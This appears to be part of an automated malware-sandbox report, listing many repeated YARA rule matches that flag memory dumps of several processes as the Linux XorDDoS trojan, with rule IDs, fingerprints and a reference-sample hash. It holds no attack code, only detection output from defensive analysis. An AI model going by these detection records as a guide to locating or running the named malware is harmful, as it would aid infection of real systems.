Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
